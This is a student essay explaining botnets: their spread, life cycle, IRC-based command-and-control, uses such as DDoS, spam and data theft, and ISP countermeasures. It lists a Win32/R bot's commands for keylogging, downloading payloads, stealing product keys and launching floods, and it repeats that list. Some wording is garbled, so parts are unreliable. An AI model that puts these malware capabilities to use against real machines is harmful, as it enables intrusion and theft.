Study On What A Botnet Is Computer Science Essay


This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

A botnet is a network of malicious computers controlled by a single person or a group, In other words we can define botnet as it is software which is used to perform automated tasks without any human interruption. The term is a comparable to the phrase "Robot Network". Usually, these malicious scripts run on the Microsoft Windows operating system that have been infected with some sort of malware. These computers swap a few words with other botnet machines via the Internet. Most botnets are distributed-design system, with the botnet operator giving instructions to only a small number of machines. These machines then broadcast the instructions to other compromised machines, usually via IRC. The scattered design prevents the detection of the controlling computers. The anonymity that a botnet affords often helps the user avoid detection and possible action.

Botnets are helpful in performing responsibilities that would be impracticable given only a single computer, single IP address, or a single Internet connection. To begin with, botnets were used for performing distributed denial of service attacks. However, most recent web servers have developed strategies to combat such DDoS attacks, making this use of a botnet unsuccessful. In addition, many counter-DDoS strategies blacklist the IP addresses of attacking computers, thus exposing the botnet's machines. As the spam market has become gainful, and ISPs usually discontinue service to subscribers who send spam, botnets were found to be an effective resource for sending spam. Furthermore, many compromised computers contain address books of email addresses which can be incorporated into the list of addresses to send spam to. Zombies that are not actively sending spam at any point in time can be configured to scratch the web looking for new email addresses to spam, adding further value to the botnet.

A consequential purpose of the botnet is to locate and assistance to extra computers. While this is not considered as a primary purpose in and of itself, the development of the botnet via modification of recent computers helps it carry out the chief objectives extra resourcefully. Thus, this secondary purpose is frequently the collection of a botnet's responsibilities. Many computer networks, mainly those by means of Microsoft Windows computers running the default settings, naturally trust other computers on the identical network. Thus, a particular compromised mechanism on such a set-up constitutes an attack vector moving other machines on the network. Earlier secondary botnet objectives consist of website publication clicking, web browser toolbar installations, key sorting, and social bookmarking poll arrangement [1].

M:\My Documents\My Pictures\botnet.gif

Figure : Life Cycle of Botnets

Current Estimates of the scale of the Botnet problem.[2]

Statistics for Week ending November 14, 2010

M:\My Documents\My Pictures\261-19-botnet_pie.png

M:\My Documents\My Pictures\fig_15.jpg

The Botnet Life Cycle [3]

The life of a bot user can be described as a life sequence. Steps 5 through 8 are iterative and are frequent until the command to discard the client which is given.

1) Computer exploited and becomes a botclient.

2) New botclient rallies to let bot hered know he's fixed the botnet.

3) Recover the latest Anti-A/V component.

4) Make safe the new botclient from A/V, user detection, and other hacker intervention.

5) Listen or subscribe to the C&C Server/Peer for commands which will be used.

6) Retrieve the payloads modules.

7) Perform the commands.

8) Description results back to the C&C server.

9) On command, remove all proof and abandon the client.

How a Botnet Is Controlled

The invader gives commands to the botnet are generally referred to as the bot herder or controller. Botnets used to be run by individuals, but in recent years, botnets have become more 'commercialized', and it is idea that many botnets these days are in the hands of illegal syndicates.

To be in command of the botnet, the bot herder uses an application known as a user program to issue instructions to the bot programs installed on zombies. This is extremely similar to how a backdoor is guarded and allows the bot herder to work very well, as they can simply provide commands to a single zombie, or multiple zombies, or yet the entire botnet.

Using the client, the bot herder can express a single zombie to carry out a certain action. For example, it can be efficient to send all the e-mail addresses stored on its hard drive to a isolated website, where it can be added to a spammer's mailing record. Alternatively, all the zombies in the botnet can be commanded to carry out the same routine, such as transmit requests to a specific website (on the whole, a Denial of Service or DoS attack).

The connection between the zombies and the client controlling them is known as a command-and-control (C&C) infrastructure. The zombie or website or server that hosts the client is known as the C&C server. The next image is a simplified view of this infrastructure:

Of course, in real life, a botnet's organization can be far more complicated. Some botnets will use many C&C servers, using the redundancy as a type of defence; others will have only one C&C server, but will continually alter the machine the client application is saved on, also for improved protection.

Bot herders put in all these security method for one simple description: the C&C server is the nerve center of the whole botnet, and also its Achilles heel.

Controlling the Botnet

To run the bots, bot-herders go through the channel like ordinary IRC users and issue specially formatted instructions. With some information, such as commands to collect and report information about the victim's computer, the bots account their marks as chat messages within the IRC channel, or save them locally as files that the herder can retrieve later. Depending on the capabilities of the bot malware, bot-herders can execute a wide range of actions, as described in "How Botnets Are Used.". A short selection of typical botnet commands, in this case from the Win32/R bot family, provides an idea of the kinds of operations a herder can execute:

.capture. Generates and saves an image or video file. Depending on the parameters used, this file could be a screenshot of the victim's desktop or a still image or video from the victim's webcam. The operator can recover the saved picture using the .get command.

.ddos.syn, .ddos.ack, .ddos.random. Launches a DDoS attack on a specified IP address for a specified length of time.

.download. Downloads a file from a specified URL to the victim's computer and optionally executes it.

.find file. Searches for files on the victim's computer by name and returns the paths of any files found.

.getcdkeys. Returns product keys for software installed on the victim's computer.

.key log. Logs the victim's keystrokes and saves them to a file.

.login, .logout. Authenticates the bot-herder with the bots. Before issuing commands to any bots in the channel, the bot-herder must use the .login command with a password that is specified in the bots' configuration data so the bots will recognize the bot-herder as an authorized controller.

.open. Opens a program, an image, or a URL in a web browser.

.procs. Lists the processes running on the victim's computer. Other commands can then be used to kill processes by name or ID.

How botnets are utilised?

A botnet can be used as a platform for a variety of criminal activities, depending on how the bot-herder chooses to configure the individual nodes. In addition to identity theft, botnets have many uses, some of which are described in the following subsections.



Denial-of-Service Attacks

Installing Malware

Click Fraud

Stealing Confidential Data

Distributing Malware

Controlling the Botnet

After a bot infects a computer the attackers tries to establish a connection with the victim's computer and firstly looks for hostname and after finding the hostname he tries to establish the connection through pinging into victim's computer. After the connection is established the

The bot tries to join the operator's channel as configured to victim settings.

Here are some of the commands that are used by attacker to activate his actions in victim's computer.

.Capture: This command saves an image or video of the victims screenshot

.download: It downloads a file from a URL to victim's computer

. getcdkeys. Returns product keys for software installed on the victim's computer

.find file. Searches for files on the victim's computer by name and returns the paths of any files found..

Capture. Generates and saves an image or video file. Depending on the parameters used, this file could be a screenshot of the victim's desktop or a still image or video from the victim's webcam. The operator can recover the saved picture using the .get command.

.ddos.syn, .ddos.ack, .ddos.random. Launches a DDoS attack on a specified IP address for a specified length of time.

key log. Logs the victim's keystrokes and saves them to a file.

.download. Downloads a file from a specified URL to the victim's computer and optionally executes it.







Internet Service Providers.

The internet economy is highly reliant on information and network security.

Estimates of the direct damage caused by internet security incidents vary wildly, but typically range in the tens of billions of US dollars per year for the U.S. alone (e.g., US GAO 2007; Bauer et al. 2008). In addition, all stakeholders in the information and communication system incur indirect costs of possibly even larger magnitude, including costs of prevention. While this damage is related to a wide variety of threats, the rise of malicious software („malware.) and botnets are seen as a, if not the, most urgent security threat we currently face.

ISP's should not share confidential information. They should not expose the username and password of others.ISP's should not share information which is very confidential like credit card numbers,pins, phone numbers and addresses etc.

They should not use weak antivirus and weak firewalls which inturn increases the chances of attacks.

ISP's should maintain the information very confidential.

ISP's should use strong antivirus which are up to date and they should have various countering measures.

The Security concerns when the information being exchanged then the ISP's should block the connection and they should not give the connection unless and until the problem is rectified

Writing Services

Essay Writing

Find out how the very best essay writing service can help you accomplish more and achieve higher marks today.

Assignment Writing Service

From complicated assignments to tricky tasks, our experts can tackle virtually any question thrown at them.

Dissertation Writing Service

A dissertation (also known as a thesis or research project) is probably the most important piece of work for any student! From full dissertations to individual chapters, we’re on hand to support you.

Coursework Writing Service

Our expert qualified writers can help you get your coursework right first time, every time.

Dissertation Proposal Service

The first step to completing a dissertation is to create a proposal that talks about what you wish to do. Our experts can design suitable methodologies - perfect to help you get started with a dissertation.

Report Writing

Reports for any audience. Perfectly structured, professionally written, and tailored to suit your exact requirements.

Essay Skeleton Answer Service

If you’re just looking for some help to get started on an essay, our outline service provides you with a perfect essay plan.

Marking & Proofreading Service

Not sure if your work is hitting the mark? Struggling to get feedback from your lecturer? Our premium marking service was created just for you - get the feedback you deserve now.

Exam Revision

Exams can be one of the most stressful experiences you’ll ever have! Revision is key, and we’re here to help. With custom created revision notes and exam answers, you’ll never feel underprepared again.